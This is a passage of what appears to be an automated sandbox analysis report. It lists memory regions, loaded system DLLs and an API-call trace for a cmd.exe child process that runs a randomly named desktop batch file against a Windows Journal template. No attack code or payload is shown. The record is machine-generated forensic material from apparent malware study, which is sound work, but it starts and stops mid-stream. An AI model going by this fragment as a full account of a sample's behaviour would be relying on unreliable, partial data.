0x4f70000 end_va = 0x50f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f70000" filename = "" Region: id = 1799 start_va = 0x5100000 end_va = 0x5280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005100000" filename = "" Region: id = 1800 start_va = 0x5290000 end_va = 0x668ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005290000" filename = "" Region: id = 1801 start_va = 0x6690000 end_va = 0x69c6fff entry_point = 0x6690000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1802 start_va = 0x74480000 end_va = 0x744a7fff entry_point = 0x74480000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1803 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1804 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1805 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1806 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1807 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1808 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1809 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1810 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1811 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1812 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1813 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1814 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1815 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1816 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1817 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1818 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1819 start_va = 0x7e9a0000 end_va = 0x7ea9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e9a0000" filename = "" Region: id = 1820 start_va = 0x7eac6000 end_va = 0x7eac8fff entry_point = 0x0 region_type = private name = "private_0x000000007eac6000" filename = "" Thread: id = 151 os_tid = 0x99c Thread: id = 152 os_tid = 0x904 Process: id = "25" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x71b17000" os_pid = "0xa40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\"\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1848 start_va = 0x7a0000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1849 start_va = 0x7c0000 end_va = 0x7c1fff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 1850 start_va = 0x7d0000 end_va = 0x7e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 1851 start_va = 0x7f0000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 1852 start_va = 0x830000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 1853 start_va = 0x930000 end_va = 0x933fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 1854 start_va = 0x940000 end_va = 0x940fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 1855 start_va = 0x950000 end_va = 0x951fff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 1856 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1857 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 1858 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1859 start_va = 0x7eb00000 end_va = 0x7eb22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eb00000" filename = "" Region: id = 1860 start_va = 0x7eb2b000 end_va = 0x7eb2dfff entry_point = 0x0 region_type = private name = "private_0x000000007eb2b000" filename = "" Region: id = 1861 start_va = 0x7eb2e000 end_va = 0x7eb2efff entry_point = 0x0 region_type = private name = "private_0x000000007eb2e000" filename = "" Region: id = 1862 start_va = 0x7eb2f000 end_va = 0x7eb2ffff entry_point = 0x0 region_type = private name = "private_0x000000007eb2f000" filename = "" Region: id = 1863 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1864 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1865 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 1866 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1867 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 1874 start_va = 0x980000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1875 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1876 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1877 start_va = 0xaa0000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 1878 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1942 start_va = 0x7a0000 end_va = 0x7affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 1943 start_va = 0x990000 end_va = 0xa4dfff entry_point = 0x990000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1944 start_va = 0xa50000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 1945 start_va = 0xba0000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 1946 start_va = 0xdf0000 end_va = 0xdfffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1947 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1948 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1949 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1950 start_va = 0x7ea00000 end_va = 0x7eafffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea00000" filename = "" Region: id = 1951 start_va = 0x7eb28000 end_va = 0x7eb2afff entry_point = 0x0 region_type = private name = "private_0x000000007eb28000" filename = "" Region: id = 1952 start_va = 0x7b0000 end_va = 0x7b3fff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 1957 start_va = 0x7c0000 end_va = 0x7c3fff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 1958 start_va = 0x74540000 end_va = 0x74547fff entry_point = 0x74540000 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 1959 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1960 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1961 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1962 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1963 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1964 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1965 start_va = 0x960000 end_va = 0x96ffff entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 1966 start_va = 0xe00000 end_va = 0x1136fff entry_point = 0xe00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 153 os_tid = 0xa48 [0220.008] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0220.008] __set_app_type (_Type=0x1) [0220.008] __p__fmode () returned 0x77984d6c [0220.008] __p__commode () returned 0x77985b1c [0220.008] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0220.008] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0220.008] GetCurrentThreadId () returned 0xa48 [0220.008] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa48) returned 0x84 [0220.008] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0220.008] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0220.008] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.330] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.330] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x92fd1c | out: phkResult=0x92fd1c*=0x0) returned 0x2 [0220.330] VirtualQuery (in: lpAddress=0x92fd23, lpBuffer=0x92fcd4, dwLength=0x1c | out: lpBuffer=0x92fcd4*(BaseAddress=0x92f000, AllocationBase=0x830000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.331] VirtualQuery (in: lpAddress=0x830000, lpBuffer=0x92fcd4, dwLength=0x1c | out: lpBuffer=0x92fcd4*(BaseAddress=0x830000, AllocationBase=0x830000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.331] VirtualQuery (in: lpAddress=0x831000, lpBuffer=0x92fcd4, dwLength=0x1c | out: lpBuffer=0x92fcd4*(BaseAddress=0x831000, AllocationBase=0x830000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.331] VirtualQuery (in: lpAddress=0x833000, lpBuffer=0x92fcd4, dwLength=0x1c | out: lpBuffer=0x92fcd4*(BaseAddress=0x833000, AllocationBase=0x830000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.331] VirtualQuery (in: lpAddress=0x930000, lpBuffer=0x92fcd4, dwLength=0x1c | out: lpBuffer=0x92fcd4*(BaseAddress=0x930000, AllocationBase=0x930000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0220.331] GetConsoleOutputCP () returned 0x1b5 [0220.391] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0220.392] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0220.392] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.392] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0220.399] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.399] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0220.412] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.412] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0220.412] _get_osfhandle (_FileHandle=0) returned 0x38 [0220.412] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0220.413] _get_osfhandle (_FileHandle=0) returned 0x38 [0220.413] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0220.413] GetEnvironmentStringsW () returned 0xaa7ea8* [0220.413] FreeEnvironmentStringsA (penv="A") returned 1 [0220.413] GetEnvironmentStringsW () returned 0xaa7ea8* [0220.414] FreeEnvironmentStringsA (penv="A") returned 1 [0220.414] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x92ec80 | out: phkResult=0x92ec80*=0x94) returned 0x0 [0220.414] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x92ec84, lpData=0x92ec8c, lpcbData=0x92ec88*=0x1000 | out: lpType=0x92ec84*=0x0, lpData=0x92ec8c*=0xc8, lpcbData=0x92ec88*=0x1000) returned 0x2 [0220.414] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x92ec84, lpData=0x92ec8c, lpcbData=0x92ec88*=0x1000 | out: lpType=0x92ec84*=0x4, lpData=0x92ec8c*=0x1, lpcbData=0x92ec88*=0x4) returned 0x0 [0220.414] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x92ec84, lpData=0x92ec8c, lpcbData=0x92ec88*=0x1000 | out: lpType=0x92ec84*=0x0, lpData=0x92ec8c*=0x1, lpcbData=0x92ec88*=0x1000) returned 0x2 [0220.414] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x92ec84, lpData=0x92ec8c, lpcbData=0x92ec88*=0x1000 | out: lpType=0x92ec84*=0x4, lpData=0x92ec8c*=0x0, lpcbData=0x92ec88*=0x4) returned 0x0 [0220.414] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x92ec84, lpData=0x92ec8c, lpcbData=0x92ec88*=0x1000 | out: lpType=0x92ec84*=0x4, lpData=0x92ec8c*=0x40, lpcbData=0x92ec88*=0x4) returned 0x0 [0220.414] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x92ec84, lpData=0x92ec8c, lpcbData=0x92ec88*=0x1000 | out: lpType=0x92ec84*=0x4, lpData=0x92ec8c*=0x40, lpcbData=0x92ec88*=0x4) returned 0x0 [0220.414] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x92ec84, lpData=0x92ec8c, lpcbData=0x92ec88*=0x1000 | out: lpType=0x92ec84*=0x0, lpData=0x92ec8c*=0x40, lpcbData=0x92ec88*=0x1000) returned 0x2 [0220.414] RegCloseKey (hKey=0x94) returned 0x0 [0220.414] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x92ec80 | out: phkResult=0x92ec80*=0x94) returned 0x0 [0220.414] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x92ec84, lpData=0x92ec8c, lpcbData=0x92ec88*=0x1000 | out: lpType=0x92ec84*=0x0, lpData=0x92ec8c*=0x40, lpcbData=0x92ec88*=0x1000) returned 0x2 [0220.414] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x92ec84, lpData=0x92ec8c, lpcbData=0x92ec88*=0x1000 | out: lpType=0x92ec84*=0x4, lpData=0x92ec8c*=0x1, lpcbData=0x92ec88*=0x4) returned 0x0 [0220.414] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x92ec84, lpData=0x92ec8c, lpcbData=0x92ec88*=0x1000 | out: lpType=0x92ec84*=0x0, lpData=0x92ec8c*=0x1, lpcbData=0x92ec88*=0x1000) returned 0x2 [0220.414] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x92ec84, lpData=0x92ec8c, lpcbData=0x92ec88*=0x1000 | out: lpType=0x92ec84*=0x4, lpData=0x92ec8c*=0x0, lpcbData=0x92ec88*=0x4) returned 0x0 [0220.414] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x92ec84, lpData=0x92ec8c, lpcbData=0x92ec88*=0x1000 | out: lpType=0x92ec84*=0x4, lpData=0x92ec8c*=0x9, lpcbData=0x92ec88*=0x4) returned 0x0 [0220.414] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x92ec84, lpData=0x92ec8c, lpcbData=0x92ec88*=0x1000 | out: lpType=0x92ec84*=0x4, lpData=0x92ec8c*=0x9, lpcbData=0x92ec88*=0x4) returned 0x0 [0220.414] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x92ec84, lpData=0x92ec8c, lpcbData=0x92ec88*=0x1000 | out: lpType=0x92ec84*=0x0, lpData=0x92ec8c*=0x9, lpcbData=0x92ec88*=0x1000) returned 0x2 [0220.414] RegCloseKey (hKey=0x94) returned 0x0 [0220.414] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb43265 [0220.414] srand (_Seed=0x5bb43265) [0220.414] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\"\"" [0220.414] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\"\"" [0220.414] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0220.415] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xaa7eb0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0220.415] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0220.415] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.415] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.415] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.415] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.415] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.415] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.415] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.415] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.415] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.415] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.415] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.415] GetEnvironmentStringsW () returned 0xaa80c0* [0220.415] FreeEnvironmentStringsA (penv="A") returned 1 [0220.415] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.415] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.415] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.415] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.415] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.415] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.415] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.415] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.415] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.415] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.415] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x92fa58 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0220.416] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x92fa58, lpFilePart=0x92fa50 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x92fa50*="Desktop") returned 0x1d [0220.416] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0220.416] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x92f7d8 | out: lpFindFileData=0x92f7d8) returned 0xaa05c8 [0220.416] FindClose (in: hFindFile=0xaa05c8 | out: hFindFile=0xaa05c8) returned 1 [0220.416] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x92f7d8 | out: lpFindFileData=0x92f7d8) returned 0xaa05c8 [0220.416] FindClose (in: hFindFile=0xaa05c8 | out: hFindFile=0xaa05c8) returned 1 [0220.416] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0220.416] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x92f7d8 | out: lpFindFileData=0x92f7d8) returned 0xaa05c8 [0220.416] FindClose (in: hFindFile=0xaa05c8 | out: hFindFile=0xaa05c8) returned 1 [0220.416] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0220.416] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0220.416] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0220.416] GetEnvironmentStringsW () returned 0xaa80c0* [0220.416] FreeEnvironmentStringsA (penv="=") returned 1 [0220.416] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0220.417] GetConsoleOutputCP () returned 0x1b5 [0220.418] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0220.418] 